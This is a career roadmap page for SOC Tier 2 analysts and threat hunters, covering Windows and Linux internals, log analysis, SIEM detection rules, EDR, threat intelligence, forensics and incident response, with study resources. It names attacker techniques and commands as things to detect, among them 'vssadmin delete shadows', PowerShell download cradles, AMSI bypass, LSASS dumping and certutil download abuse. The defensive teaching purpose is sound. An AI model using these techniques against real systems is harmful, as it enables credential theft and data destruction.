Roadmap
SOC Analyst — Tier 2 / Threat Hunter
The investigator and hunter. Takes escalated incidents from T1 and runs deep investigations, while proactively searching for threats that bypassed automated detection entirely.
OPTIMISTIC 18 months · REALISTIC 2–3 years
Stage 00
Computer & IT Fundamentals
Everything in security builds on this base. No exceptions.
Computer Hardware
- CPU, RAM, storage types (HDD, SSD, NVMe) — roles in a system
- NIC, motherboard — how components communicate
- Physical vs virtual machines — hardware abstraction
Number Systems
- Binary (base-2) — reading and converting
- Hexadecimal (base-16) — memory addresses, file hashes, color codes
- Decimal to binary to hex conversions
- Bit, byte, kilobyte, megabyte — data size literacy
How Operating Systems Work
- Kernel vs user space — privilege separation
- Processes and threads — what they are, how the OS manages them
- Memory management — virtual memory, paging, RAM allocation
- File systems — NTFS, ext4, FAT32
- System calls — how programs communicate with the OS
- Boot process — BIOS/UEFI → bootloader → kernel → init/systemd
Software Basics
- How programs compile and execute
- Static vs dynamic libraries
- Environment variables and PATH
- Services vs applications — distinction and OS management
Virtualization
- Type 1 hypervisor (bare metal) vs Type 2 (hosted)
- VMware, VirtualBox, Proxmox, Hyper-V
- Snapshots — forensic and lab relevance
Resources
- CS50 Introduction to Computer Science (Harvard, free)
- Professor Messer CompTIA A+ (free YouTube)
- TryHackMe Pre-Security path (free)
Stage 01
Operating Systems in Depth
T2 investigations are 80% Windows. Linux runs your tools. You need both cold.
Windows
- Full directory structure — C:\Windows, C:\Users, C:\Program Files, C:\ProgramData, C:\Temp and what attackers target in each
- Registry hives — HKLM, HKCU, HKCR, HKU, HKCC — attacker persistence locations: HKLM\Software\Microsoft\Windows\CurrentVersion\Run; HKCU\Software\Microsoft\Windows\CurrentVersion\Run; HKLM\System\CurrentControlSet\Services; HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options (IFEO); AppInit_DLLs — DLL injection persistence
- Windows services — SCM, service accounts, unquoted service path privilege escalation
- Task Scheduler — XML structure, trigger types, action types, attacker abuse patterns
- WMI — event subscriptions (filter, consumer, binding), attacker persistence via WMI, detection in logs
- PowerShell — execution policy bypass techniques, AMSI bypass concepts, encoded commands (-enc), download cradles (IEX, Invoke-WebRequest, Net.WebClient), logging artifacts
- Windows Event Log — Security, System, Application, Sysmon, PowerShell — full structure and querying
- Critical Event IDs: 4624 — successful logon (logon type matters: 2=interactive, 3=network, 4=batch, 5=service, 10=remote interactive); 4625 — failed logon (sub-status codes reveal lockout reason); 4634 — logoff; 4648 — logon with explicit credentials (lateral movement indicator); 4688 — process creation with command line (requires audit policy enabled); 4698/4702 — scheduled task created / modified; 4720/4722/4726 — user account created / enabled / deleted; 4732/4733 — group membership added / removed; 4740 — account lockout; 4776 — NTLM credential validation; 4768/4769/4771 — Kerberos TGT request / service ticket request / pre-auth failure; 1102 — audit log cleared (attacker covering tracks); 4719 — system audit policy changed; 7045 — new service installed
- Sysmon event IDs — full depth: EID 1 — process creation with hash and parent; EID 3 — network connection with process context; EID 7 — image/DLL loaded; EID 8 — CreateRemoteThread (process injection); EID 10 — ProcessAccess (LSASS access = credential dumping); EID 11 — FileCreate; EID 13 — registry value set; EID 22 — DNS query; EID 25 — process tampering (hollowing, herpaderping)
- PowerShell Script Block Logging (EID 4104) — deobfuscated script capture
- NTFS alternate data streams — file hiding technique, how to detect
- Volume Shadow Copies — ransomware deletion (vssadmin delete shadows), forensic recovery
- Windows memory — LSASS process, credential storage (NTLM hashes, Kerberos tickets), why it is the primary credential dumping target
- Prefetch — C:\Windows\Prefetch\, execution evidence, timestamp analysis
- Shimcache (AppCompatCache) — execution evidence in registry
- Amcache — program execution history, hash values
- MFT (Master File Table) — file system metadata, deleted file evidence
- Windows security boundaries — integrity levels (low/medium/high/system), UAC bypass techniques, token impersonation and theft
Linux
- Full filesystem hierarchy with attacker relevance — /etc, /var, /tmp, /dev/shm, /proc, /sys, /home, /root, /bin, /usr/bin, /sbin
- Investigation commands — grep, awk, sed, cut, sort, uniq, wc, diff, find, xargs, tee, strings, file, xxd
- Persistence mechanisms — cron jobs, systemd timers, rc.local, .bashrc/.profile/.bash_logout modification, SSH authorized_keys injection, SUID binary creation, LD_PRELOAD hijacking
- /proc filesystem — live process inspection without tools: /proc/[PID]/cmdline, /proc/[PID]/exe, /proc/[PID]/maps, /proc/[PID]/net/tcp
- Auditd — audit rules (auditctl), ausearch by time/key/pid, aureport summaries
- Linux capabilities — setcap, getcap, capability-based privilege escalation
- PAM (Pluggable Authentication Modules) — auth configuration, PAM backdoor technique
- Shared libraries — /etc/ld.so.conf, LD_PRELOAD hijacking for persistence
Resources
- TryHackMe Windows Fundamentals 1/2/3 (free)
- TryHackMe Linux Fundamentals 1/2/3 (free)
- OverTheWire Bandit (free)
- HTB Academy Windows Fundamentals module
- SwiftOnSecurity Sysmon config (GitHub, free)
Stage 02
Networking Fundamentals
Network forensics is a core T2 skill. Every investigation involves reconstructing traffic patterns across hosts.
OSI Model — All 7 Layers with Attack Mapping
- L2 — ARP poisoning, VLAN hopping, MAC flooding
- L3 — IP spoofing, routing attacks, ICMP tunneling
- L4 — SYN floods, port scanning patterns, TCP session hijacking
- L7 — DNS poisoning, HTTP injection, application-layer C2
TCP/IP Deep
- TCP handshake and teardown — normal vs anomalous
- TCP flags — SYN, ACK, FIN, RST, PSH, URG — reading in investigation context
- UDP — connectionless behavior, DNS/DHCP/NTP/TFTP
- ICMP — ping, traceroute, unreachable types, tunneling patterns
IP Addressing
- Subnetting, CIDR, private ranges, loopback, APIPA
- NAT impact on log source attribution in investigations
- IPv6 — link-local, global unicast, dual-stack environments
Protocols — Full Depth
- DNS, DHCP, HTTP/HTTPS/TLS, SMB, RDP, SSH, FTP, Kerberos, LDAP/LDAPS, WinRM — all from T1 coverage plus:
- NetBIOS (137/138/139) and LLMNR (5355) — name resolution poisoning attack surface
- DCOM/RPC (135 + dynamic ports) — lateral movement vehicle, WMI remote execution
- MSSQL (1433) — SQL Server auth, xp_cmdshell abuse for command execution
- NFS (2049) — network file shares, permission misconfigurations
- SNMP (161/162) — community string exposure in older environments
Common Ports — Full Reference
- 20/21 FTP | 22 SSH | 23 Telnet | 25 SMTP | 53 DNS | 67/68 DHCP | 80 HTTP | 88 Kerberos | 110 POP3 | 135 RPC/DCOM | 137-139 NetBIOS | 143 IMAP | 389 LDAP | 443 HTTPS | 445 SMB | 636 LDAPS | 1433 MSSQL | 3306 MySQL | 3389 RDP | 5355 LLMNR | 5432 PostgreSQL | 5985/5986 WinRM | 8080/8443 alt HTTP
Network Infrastructure
- Switches — MAC tables, SPAN/port mirroring setup for investigation traffic capture
- Routers, firewalls, NGFW — rule analysis during incident investigation
- IDS/IPS, proxies, DMZ, VLANs
- Network segmentation — understanding what should and should not be talking to what
Resources
- Professor Messer Network+ (free YouTube)
- TryHackMe networking modules
- Cisco Packet Tracer (free)
Stage 03
Security Fundamentals
T1 security fundamentals in full. Security+ is the baseline cert before advancing further.
Security Fundamentals
- CIA Triad, AAA, non-repudiation, threat/vulnerability/risk
- Authentication — MFA, password hashing, Pass-the-Hash, token auth, certificates
- Cryptography — symmetric, asymmetric, hashing, PKI, TLS
- Malware types — virus, worm, trojan, ransomware, rootkit, keylogger, fileless, RAT, dropper
- Attack types — phishing, brute force, credential stuffing, password spraying, DDoS, MitM, SQLi, XSS, CSRF, buffer overflow, LotL/LOLBAS, Pass-the-Hash, Kerberoasting
- Defensive controls — SIEM, EDR, XDR, SOAR, DLP, IDS/IPS, honeypots, patching
- Frameworks — NIST CSF 2.0, MITRE ATT&CK overview, Cyber Kill Chain, CIS Controls, ISO 27001, NIST 800-53, PCI-DSS, HIPAA, DoD 8570
Resources
Stage 04
Traffic Analysis & Packet Inspection
T2 investigations require packet-level analysis. Reconstruct attacks from raw PCAP. Identify advanced attacker techniques in traffic.
Wireshark — Advanced
- All T1 Wireshark skills (capture/display filters, TCP stream following, object export, IO graphs, protocol hierarchy, Statistics → Conversations)
- tshark — command-line Wireshark, scripting PCAP analysis, output to CSV/JSON
- Decrypting TLS traffic — pre-master secret log (SSLKEYLOGFILE), importing into Wireshark
- JA3/JA3S fingerprinting — TLS client/server fingerprinting, C2 tool identification
- Extracting credentials from cleartext protocols — FTP, HTTP Basic auth, Telnet
- Reconstructing file transfers from SMB, HTTP, FTP streams
- Kerberoasting in PCAP — high-volume TGS-REQ for service account SPNs
- LLMNR/NBT-NS poisoning — broadcast query and spoofed response patterns
- Pass-the-Hash — NTLM authentication with credential anomalies
Network Forensics Tools
- tcpdump — advanced BPF filtering, scripted capture, pcap replay
- NetworkMiner — automated host, credential, file extraction from PCAP
- Zeek — full log suite: conn.log, dns.log, http.log, ssl.log, files.log, kerberos.log, smb_files.log, smb_cmd.log, weird.log, notice.log — pivoting across logs by uid/conn_uid
- Suricata — rule writing (action, protocol, src/dst, msg, content, pcre, sid), eve.json analysis, custom detection signatures
- Snort — rule format, pcap replay testing
- Rita (Real Intelligence Threat Analytics) — C2 beacon detection using statistical analysis on Zeek conn.log, long connection analysis, DNS baselining
- Arkime (Moloch) — full PCAP search and session visualization in web UI
- Wireshark + NetworkMiner on Malware-Traffic-Analysis.net captures
Advanced Patterns to Identify
- All T1 patterns plus: Kerberoasting — high-volume TGS-REQ targeting service account SPNs; AS-REP Roasting — AS-REQ without pre-authentication (RC4 encryption preference); DCSync — AD replication traffic from non-DC source IP (GetNCChanges); Pass-the-Hash — NTLM authentication from unusual source, mismatched credentials; LLMNR/NBT-NS poisoning — broadcast responses to unicast queries; SMB relay — NTLM relay attack indicators in traffic; DNS tunneling — iodine/dnscat2 signatures, high subdomain entropy, byte ratio analysis, response sizes; C2 beacon analysis using Rita — low and slow connections, jitter patterns, beacon scoring; Lateral movement via WinRM — HTTP/S to port 5985/5986 between internal hosts; DCOM/RPC lateral movement — port 135 then dynamic high port connections
Resources
- TryHackMe Wireshark rooms (free)
- Malware-Traffic-Analysis.net (free real PCAPs)
- HTB Academy Network Traffic Analysis module
- Rita (github.com/activecm/rita, free)
- TryHackMe Zeek room (free)
- TryHackMe Snort room (free)
Stage 05
Log Analysis — Advanced
T2 analysts reconstruct full attacker timelines across multiple log sources simultaneously. Raw log fluency is non-negotiable.
Log Correlation Fundamentals
- Normalizing timestamps across sources — UTC, epoch, timezone offsets
- Building attacker timelines from multiple log sources — sequence reconstruction
- Pivoting technique — starting from one IOC and finding every related log entry across all sources
- Log gap analysis — identifying where attacker cleared or disabled logging
- Baselining — knowing normal before identifying abnormal at account, host, and network level
Windows Event Logs — Investigation Depth
- Logon type analysis — type 3 (network) + type 10 (remote interactive) chain indicating lateral movement
- Process creation chains — correlating 4688 events across multiple hosts by username and timeframe
- Scheduled task forensics — 4698 + task XML analysis for persistence
- Account manipulation chains — 4720 + 4732 + 4624 = account created, added to admin group, used for logon
- Sysmon investigation chains: EID 1 (process) + EID 3 (network) — process spawning C2 connection; EID 10 (ProcessAccess on lsass.exe) — credential dumping detection; EID 8 (CreateRemoteThread) — process injection detection; EID 7 (ImageLoad) — DLL hijacking / sideloading detection
- PowerShell EID 4104 — deobfuscated script block content analysis
- 1102 (log cleared) — immediate escalation trigger, begin evidence preservation
Active Directory Logs
- Domain controller event IDs: 4768 — Kerberos TGT request (AS-REQ) — source IP, username, encryption type; 4769 — Kerberos service ticket request (TGS-REQ) — high volume = Kerberoasting; 4771 — Kerberos pre-auth failure — AS-REP Roasting indicator (no pre-auth required); 4625 on DC with sub-status 0xC000006A — password spray pattern; 4662 — object access on AD objects — DCSync detection (replication rights); 4728/4732/4756 — group membership changes in privileged groups
- NTLM authentication events — 4776 with error codes
- Replication events — Event ID 4929 — AD replication source removed (DCSync prep)
Linux Logs — Investigation Depth
- /var/log/auth.log investigation — SSH brute force chains, successful login after failures, sudo abuse
- /var/log/secure — same analysis on RHEL/CentOS
- Auditd logs — syscall auditing for file access, execution, privilege escalation
- crontab and systemd timer forensics — new entries, modified timestamps
- /proc forensics — examining running processes, deleted executables still running, network connections per PID
- bash_history gaps — deleted lines, unset HISTFILE, HISTSIZE=0 indicators
Firewall and Proxy Logs — Correlation
- Correlating firewall denies with internal scanning activity
- Proxy logs for C2 callbacks — beacon regularity, user-agent analysis, destination reputation
- DNS logs — NXDomain spikes, DGA detection, tunneling detection
- Correlating across firewall + proxy + DNS + endpoint for full C2 chain reconstruction
Cloud Logs
- AWS CloudTrail — management events, data events, structure (eventName, userIdentity, sourceIPAddress, requestParameters); Key events: ConsoleLogin, CreateUser, AttachUserPolicy, RunInstances, GetSecretValue, ListBuckets; Anomalies: root account usage, API calls from unusual IPs, IAM privilege escalation chains
- Azure Activity Log — operation name, caller, resource, status; Key events: Add member to role, Create or update virtual machine, Delete key vault key; Microsoft Entra ID sign-in logs — MFA bypass indicators, conditional access failures
- GCP Audit Logs — data access, admin activity, system events
Resources
- TryHackMe Log Analysis rooms (free)
- HTB Academy Windows Event Logs & Finding Evil module
- HTB Academy Working with IDS/IPS module
- LetsDefend SOC path (free tier)
- CyberDefenders labs
- SANS Reading Room (free whitepapers)
Stage 06
SIEM Operations — Advanced
T2 analysts go beyond alert triage, writing detection rules, tuning correlation logic, and building hunts inside the SIEM.
SIEM Fundamentals — Deep
- All T1 SIEM fundamentals (ingestion, normalization, correlation, alerting)
- Data model depth — CIM field mapping, custom sourcetype parsing
- Retention architecture — hot/warm/cold data tiers, search performance implications
- SIEM as investigation platform — not just alerting but forensic timeline reconstruction
Splunk — Advanced
- All T1 SPL skills plus: subsearch — nested searches for complex correlations; append, appendcols, join — combining result sets; streamstats — running calculations within a time window; eventstats — aggregate without losing individual events; cluster — grouping similar log messages for noise reduction; anomalydetection — statistical outlier identification; tstats — accelerated search over datamodels for large-scale queries; makeresults + eval — building test datasets for rule validation; inputlookup / outputlookup — IOC enrichment from threat intel lists; map — looping searches (use sparingly)
- Writing detection content in Splunk: Brute force with success: failed logon threshold followed by successful logon from same source; Kerberoasting: high volume EID 4769 with RC4 encryption type from single source; LSASS access: Sysmon EID 10 where TargetImage contains lsass.exe; Encoded PowerShell: EID 4688 where CommandLine contains "-enc" or "-EncodedCommand"; Scheduled task creation: EID 4698 outside business hours; New local admin account: EID 4720 followed by EID 4732 adding to Administrators group; Impossible travel: successful logon from two geolocations within impossible time window; Large data transfer: bytes_out threshold per destination per user per hour
- Alert tuning — reducing false positive rate, whitelisting known-good, throttling noisy rules
- Splunk Enterprise Security (ES) — risk-based alerting, risk score framework, notable events, asset and identity framework
Microsoft Sentinel — Advanced
- All T1 KQL plus: mv-expand — expanding dynamic arrays; parse_json / parse_csv — structured data extraction; bag_unpack — flattening dynamic columns; ipv4_is_private() — filtering internal traffic; geo_info_from_ip_address() — geolocation enrichment; Anomaly detection functions — series_decompose_anomalies()
- Writing analytic rules: Scheduled query rules — custom KQL with entity mapping; Near-real-time (NRT) rules — low-latency detection; Fusion rules — ML-based multi-stage attack correlation
- Hunting queries — proactive investigation without alert trigger
- Watchlists — IOC lists, VIP user lists, high-value asset lists for enrichment
- Entity pages — user, host, IP timelines for investigation pivoting
- Notebooks (Jupyter) — advanced investigation and hunting with Python
Detection Engineering Foundations
- Sigma rules — vendor-neutral detection rule format, YAML syntax, field mappings
- Converting Sigma to Splunk SPL, KQL, QRadar AQL using sigmac/pySigma
- YARA rules — file and memory pattern matching for malware detection: Rule structure — meta, strings (text, hex, regex), condition; Writing rules for common malware artifacts; Using YARA with VirusTotal, ClamAV, LOKI scanner
- Detection coverage mapping — using ATT&CK Navigator to identify gaps
- Alert lifecycle — creation → testing → tuning → promotion → retirement
Resources
- Splunk free training (splunk.com)
- Boss of the SOC (BOTS) dataset (free)
- TryHackMe Splunk Advanced rooms
- HTB Academy Intro to Splunk module
- Sigma GitHub repository (free)
- YARA documentation (free)
- TryHackMe Microsoft Sentinel room
Stage 07
Endpoint Detection & Response — Advanced
T2 analysts conduct deep endpoint forensics using EDR telemetry, not just alert review.
EDR — Deep Investigation
- All T1 EDR fundamentals (CrowdStrike, MDE, SentinelOne) plus:
- Process injection techniques and EDR detection: DLL injection — LoadLibrary, remote thread creation; Process hollowing — unmapping legitimate executable, loading malicious code; Process doppelgänging — NTFS transaction abuse; Reflective DLL injection — loading from memory without disk artifact; Thread hijacking — hijacking existing thread context
- LSASS memory access patterns — Mimikatz signatures, comsvcs.dll minidump, custom credential dumping tools
- Token impersonation — SeImpersonatePrivilege, Potato exploits, token theft
- Living-off-the-Land (LotL) — wmic.exe, certutil.exe, regsvr32.exe, mshta.exe, rundll32.exe abuse patterns
CrowdStrike Falcon — Advanced
- Falcon Fusion — SOAR workflow automation, trigger conditions, actions
- Custom IOA (Indicator of Attack) rules — behavioral detection beyond signatures
- Threat Graph queries — GraphQL-based relationship hunting
- RTR scripting — custom scripts for mass host investigation
- Event Search / Investigate — raw telemetry hunting with event_simpleName field
- Hunting queries: lsass access, scheduled task via schtasks.exe, certutil download, encoded PowerShell
Microsoft Defender for Endpoint — Advanced
- Advanced Hunting — complex multi-table queries: Joining DeviceProcessEvents + DeviceNetworkEvents on DeviceId and Timestamp; Joining DeviceLogonEvents + DeviceFileEvents for credential-followed-by-staging chains; IdentityLogonEvents — Azure AD sign-in correlation with endpoint activity; EmailEvents — phishing email correlation with endpoint execution
- Custom detection rules — KQL queries scheduled as persistent detections
- Vulnerability management integration — correlating exposed CVEs with alert activity
- Secure Score — understanding the posture metrics T2 analysts are expected to improve
Endpoint Forensics Without EDR
- For environments without EDR or for forensic depth beyond EDR:
- Autoruns (Sysinternals) — comprehensive persistence mechanism enumeration
- Process Explorer (Sysinternals) — detailed process tree, DLL inspection, VirusTotal integration
- TCPView (Sysinternals) — live network connections per process
- ProcMon (Sysinternals) — real-time process, file, registry monitoring
- Volatility 3 — memory forensics framework (overview at this stage, deep dive in Stage 9)
- FTK Imager — disk image acquisition, triage collection
- KAPE (Kroll Artifact Parser and Extractor) — rapid forensic artifact collection
Resources
- CrowdStrike free training portal (free)
- Microsoft Learn MDE Advanced Hunting (free)
- TryHackMe EDR rooms
- HTB Academy Incident Handling with Splunk
- Sysinternals Suite documentation (free)
- Volatility Foundation documentation (free)
Stage 08
Threat Intelligence — Operational
T2 analysts consume and apply threat intelligence operationally — enriching investigations, hunting by TTP, and integrating intel into detection content.
MITRE ATT&CK — Operational Depth
- All T1 ATT&CK knowledge plus:
- ATT&CK for ICS — industrial control system technique matrix
- ATT&CK for Mobile — iOS and Android technique matrix
- Sub-technique depth — know the specific implementations, not just technique IDs
- Threat group profiles in depth — APT28, APT29, Lazarus Group, FIN7, FIN11, Lapsus$, BlackCat/ALPHV — TTPs, tools, infrastructure patterns, targets
- ATT&CK data sources — mapping detections to data source requirements
- D3FEND — MITRE defensive countermeasure framework, pairing with ATT&CK
- ATT&CK Navigator — building coverage heatmaps, threat group overlays, gap analysis
Threat Intelligence Standards
- STIX 2.1 — Structured Threat Information eXpression: Object types — Indicator, Malware, Threat Actor, Campaign, Course of Action, Attack Pattern, Relationship; Indicator pattern language — [file:hashes.MD5 = 'abc123']; Bundle structure — packaging multiple STIX objects
- TAXII 2.1 — Trusted Automated eXchange of Intelligence Information: API roots, collections, pushing/pulling bundles; How MISP and OpenCTI implement TAXII for feed sharing
- TLP (Traffic Light Protocol) — WHITE, GREEN, AMBER, AMBER+STRICT, RED — sharing restrictions
- TLP 2.0 changes — understanding current standard
Threat Intelligence Platforms
- MISP — event structure, attributes, objects, galaxies (ATT&CK, threat actors, ransomware), tags, sharing groups, feeds: Ingesting external feeds — CIRCL, abuse.ch, AlienVault OTX; Creating events from incident IOCs; Exporting to SIEM — MISP → Splunk lookup, Sentinel watchlist; PyMISP — Python API for automation
- OpenCTI — entity relationships, campaign tracking, threat actor attribution graphs: STIX 2.1 native — richer relationship modeling than MISP; Connectors — MITRE ATT&CK, abuse.ch, Shodan, VirusTotal; Investigation dashboard — pivoting across entities
- Recorded Future / Anomali / Intel 471 — commercial platform awareness
IOC Enrichment — Advanced
- All T1 enrichment tools (VirusTotal, AbuseIPDB, Shodan, URLScan, MalwareBazaar, URLhaus, ThreatFox, OTX, WHOIS, GreyNoise, Any.run) plus:
- Passive DNS pivoting — SecurityTrails, DNSDB, RiskIQ PassiveTotal — historical infrastructure mapping
- Certificate transparency logs — crt.sh — finding attacker infrastructure from TLS certs
- Favicon hashing — Shodan favicon search for C2 infrastructure reuse
- ASN pivoting — finding related attacker infrastructure in same autonomous system
- Maltego — visual link analysis, transforms for automated pivoting across data sources
- SpiderFoot — automated OSINT reconnaissance and IOC expansion
Hypothesis-Driven Threat Hunting
- What threat hunting is — proactive search without an existing alert trigger
- The hunting process: 1. Hypothesis formation — "Do we have Kerberoasting activity that bypassed detection?"; 2. Data identification — what logs/sources would show this; 3. Query execution — SIEM/EDR search across historical data; 4. Analysis — distinguishing normal from anomalous results; 5. Documentation — findings, new detections created, negative hunts recorded
- Hunt hypothesis sources — ATT&CK threat group reports, vendor threat intelligence, recent CVEs, peer organization breaches
- Common hunt hypotheses for T2: Lateral movement via legitimate credentials (no malware alert triggered); Data staging before exfiltration (large compressed archives in unusual locations); Living-off-the-land execution (LOLBin usage without corresponding user activity); Dormant implants with low-frequency beaconing; Kerberoasting / AS-REP Roasting without endpoint alert; Credential access via LSASS access with non-standard tools
- Documenting hunts — hunt log format, negative results are still value
Resources
- MITRE ATT&CK website (attack.mitre.org, free)
- ATT&CK Navigator (free)
- MISP (misp-project.org, free)
- OpenCTI (github.com/OpenCTI-Platform, free)
- TryHackMe Threat Intelligence rooms
- HTB Academy Threat Hunting module
- AttackIQ Academy (free)
Stage 09
Scripting & Automation
Python and PowerShell are non-negotiable at T2. Scripting separates efficient investigators from those who manually click through every case.
Python for Security
- Fundamentals — variables, data types, conditionals, loops, functions, error handling
- File I/O — reading and writing text files, CSV, JSON
- String manipulation — regex (re module), parsing log lines
- Requests library — HTTP API calls, authentication headers, pagination
- JSON handling — parsing API responses from VirusTotal, Shodan, MISP
- subprocess — calling system commands from Python scripts
- Collections — Counter, defaultdict for log analysis aggregation
- datetime — timestamp parsing, timezone normalization
- Practical scripts to build: IOC bulk enrichment — read list of IPs/hashes, query VirusTotal API, output enriched CSV; Log parser — parse Windows event log CSV exports, filter by EventID, output timeline; MISP event creator — take incident IOCs, create MISP event via PyMISP; Splunk alert enricher — query Splunk API, enrich alert with context, post to TheHive; Beacon detector — parse proxy logs, calculate request intervals, flag regular beacons
PowerShell for Security
- Fundamentals — cmdlets, pipelines, variables, loops, functions, error handling
- Active Directory module — Get-ADUser, Get-ADGroup, Get-ADComputer, Get-ADGroupMember
- Event log querying — Get-WinEvent with FilterHashtable, -FilterXPath
- Remote execution — Invoke-Command, Enter-PSSession, WinRM
- File system investigation — Get-ChildItem, Get-FileHash, Get-Item -Stream (ADS)
- Registry investigation — Get-ItemProperty for Run keys and persistence locations
- Network investigation — Get-NetTCPConnection, Resolve-DnsName, Test-NetConnection
- Scheduled tasks — Get-ScheduledTask, Export-ScheduledTask XML
- Practical scripts: Enumerate all local admin accounts across domain; Find processes with LSASS handles; Extract recently created scheduled tasks with XML detail; Get all users logged into a remote host; Hash all executables in suspicious directory and check against known-good baseline
Bash for Security
- Pipeline mastery — grep, awk, sed, cut, sort, uniq, wc, tr, xargs combinations
- Log parsing one-liners — extract, filter, count, deduplicate log data at command line
- find + xargs combinations — bulk file operations
- Scripting — loops, conditionals, functions, argument handling
- Practical scripts: Parse auth.log for brute force — count failed logins by IP, threshold alert; Extract unique IPs from web server logs, query AbuseIPDB API in loop; Monitor a directory for new files, hash and log them
SOAR Integration
- What SOAR does — orchestration, automation, playbook execution
- Splunk SOAR (Phantom) — apps, actions, playbooks, visual playbook editor
- Palo Alto Cortex XSOAR — incident layout, automation scripts, integrations
- TheHive + Cortex — open-source case management + automated responder actions
- Building a simple playbook: Trigger: new SIEM alert; Action 1: enrich source IP via VirusTotal; Action 2: enrich destination domain via URLScan; Action 3: if malicious score > threshold, create TheHive case with enrichment; Action 4: post notification to Slack/Teams channel
Resources
- Python for Everybody (Coursera, free)
- Automate the Boring Stuff with Python (automatetheboringstuff.com, free)
- TryHackMe Python basics rooms
- SS64 PowerShell reference (free)
- HTB Academy Scripting for Security module
- TryHackMe SOAR rooms
Stage 10
Digital Forensics Fundamentals
T2 analysts are expected to collect and analyze forensic evidence. This is what separates an investigator from a ticket-closer.
Forensics Principles
- Order of volatility — CPU registers → RAM → swap/page file → network state → running processes → disk → optical/removable media
- Evidence preservation — write blockers, chain of custody, hashing before and after acquisition (MD5, SHA-256)
- Forensic imaging — bit-for-bit copy vs logical copy — when each is appropriate
- What not to do — do not run antivirus, do not reboot, do not write to the suspect drive
Memory Forensics
- Why memory matters — passwords, encryption keys, injected code, network connections, running processes — all visible in RAM
- Acquisition tools — WinPMEM, DumpIt, Magnet RAM Capture, FTK Imager memory acquisition
- Volatility 3 — framework for memory analysis: windows.pslist — running process list; windows.pstree — process tree showing parent/child; windows.cmdline — command line arguments per process; windows.netscan — network connections at time of acquisition; windows.dlllist — DLLs loaded per process; windows.malfind — memory regions with executable code not backed by file (injection detection); windows.hashdump — extract NTLM hashes from memory; windows.dumpfiles — extract file objects from memory; linux.bash — recover bash history from memory
Disk Forensics
- FTK Imager — creating forensic images (E01, raw/dd), verifying integrity, browsing without mounting
- Autopsy — open-source forensic platform: Adding data sources — disk images, logical files; File system analysis — directory tree, deleted files, timeline; Keyword search — searching for IOCs in disk content; Hash database — matching against known-malicious hashes; Web artifacts — browser history, downloads, cache; Registry analysis — viewing hive files directly
- KAPE (Kroll Artifact Parser and Extractor) — rapid triage collection: Targets — what to collect (event logs, prefetch, shimcache, amcache, NTUSER.dat, browser artifacts, MFT); Modules — what to parse after collection
- MFT analysis — MFTECmd to parse Master File Table — creation/access/modification timestamps, deleted file evidence
- Prefetch analysis — PECmd — execution evidence, linked files, run count, last run timestamps
- Shimcache analysis — AppCompatCacheParser — execution evidence even without Sysmon
- Amcache analysis — AmcacheParser — program execution with SHA1 hashes
Browser Forensics
- Browser artifact locations — Chrome, Firefox, Edge profiles
- History, downloads, cookies, cache, form data
- Browser extensions — malicious extension persistence
Email Forensics
- Email header analysis — Received chain, SPF/DKIM/DMARC results, X-Originating-IP
- Phishing analysis workflow — extract URLs, hash attachments, detonate in sandbox
- .eml and .msg file parsing — structure, embedded objects, MIME encoding
Resources
- TryHackMe Windows Forensics 1/2 rooms (free)
- TryHackMe Linux Forensics room (free)
- HTB Academy Introduction to Digital Forensics module
- Volatility 3 documentation (free)
- Autopsy documentation (free)
- KAPE documentation (free)
- 13Cubed YouTube channel (Windows forensics, free)
Stage 11
Incident Response — Lead
T2 analysts do not just follow playbooks. They lead investigations, make scope decisions, and own the case from detection to closure.
IR Leadership at T2
- Owning escalated incidents — taking full case ownership from T1 handoff
- Scope determination — systematic methodology for identifying all affected systems
- Impact assessment — data classification, business impact, regulatory notification triggers (GDPR 72-hour, HIPAA breach notification)
- Evidence-based decision making — containment timing based on investigative completeness vs business continuity
- Cross-team coordination — working with IT, Legal, HR, PR, executive stakeholders
- Chain of custody — maintaining defensible evidence for legal proceedings
Active Incident Investigation
- Building a unified timeline — correlating SIEM, EDR, network, cloud, and application logs
- Attacker TTPs mapping — charting the full kill chain from initial access to actions on objectives
- Lateral movement reconstruction — mapping attacker path through the environment
- Credential exposure assessment — which accounts were compromised, what they had access to
- Data exposure assessment — what data was accessed, staged, or exfiltrated
- C2 infrastructure documentation — all IPs, domains, protocols used
Common T2 Incident Types
- Business Email Compromise (BEC) — email header analysis, mailbox rule investigation, OAuth token abuse
- Ransomware response — patient zero identification, encryption timeline, backup integrity validation, ransom decision support
- Supply chain compromise — third-party software update as attack vector, IOC extraction from vendor advisory
- Insider threat — user behavior analysis, DLP alert correlation, access pattern investigation
- Cloud account compromise — IAM event analysis, resource creation review, data access audit
- Advanced persistent threat (APT) — multi-stage investigation, long dwell time, multiple lateral movement hops
Post-Incident
- Root cause analysis — the actual initial access vector, not just "malware was found"
- Lessons learned facilitation — structured review with detection gaps identified
- Detection improvements — new SIEM rules, EDR policies, network blocks from incident IOCs
- Executive briefing — one-page summary: what happened, impact, response, what changed
- Incident metrics — MTTD, MTTR, dwell time, recurrence tracking
Resources
- NIST SP 800-61 Rev 2 (free, official)
- SANS IR papers (free, sans.org/white-papers)
- LetsDefend SOC incident simulations
- CyberDefenders incident response labs
- HTB Academy Incident Handling with Splunk
FAQ
Common questions
How long does it take to become a SOC Analyst — Tier 2?
18 months optimistic at 20–25 hours/week from zero, 2–3 years realistic. The most common path is SOC T1 → SOC T2 with 12–18 months at T1. T2 demands deeper investigation skills, scripting fluency, threat hunting instincts, and the ability to determine scope and impact independently. T2 roles are fewer than T1 but higher value — analysts who add scripting, detection engineering, and hunting skills command significantly higher compensation and face less competition.
Which certifications matter for SOC T2 roles?
GCIH (GIAC Certified Incident Handler) for IR-overlapping T2 work. CySA+ for analytical depth. GCDA (GIAC Certified Detection Analyst) for detection engineering specialization. SANS-track certs are expensive but the content is the gold standard for T2 progression. Splunk Power User or Enterprise Certified Admin signal SIEM platform depth.
Do I need a CS degree?
No. T2 is meritocratic — demonstrated investigation skills and threat hunting writeups outweigh credentials. Self-taught analysts with strong CTF DFIR challenge solutions and lab investigation portfolios compete effectively. What you do need: scripting (Python at minimum), SIEM platform depth, threat intelligence consumption fluency, and at least basic memory analysis (Volatility) experience.
What separates a hired SOC T2?
Documented threat hunting writeups. Detection rules you've authored, threat hunts you've executed (even in lab environments), and investigation narratives that demonstrate analytical reasoning. Generic 'I know KQL' candidates lose to candidates with portfolio investigation work. Detection Engineering is the fastest-growing exit path from the T2 track.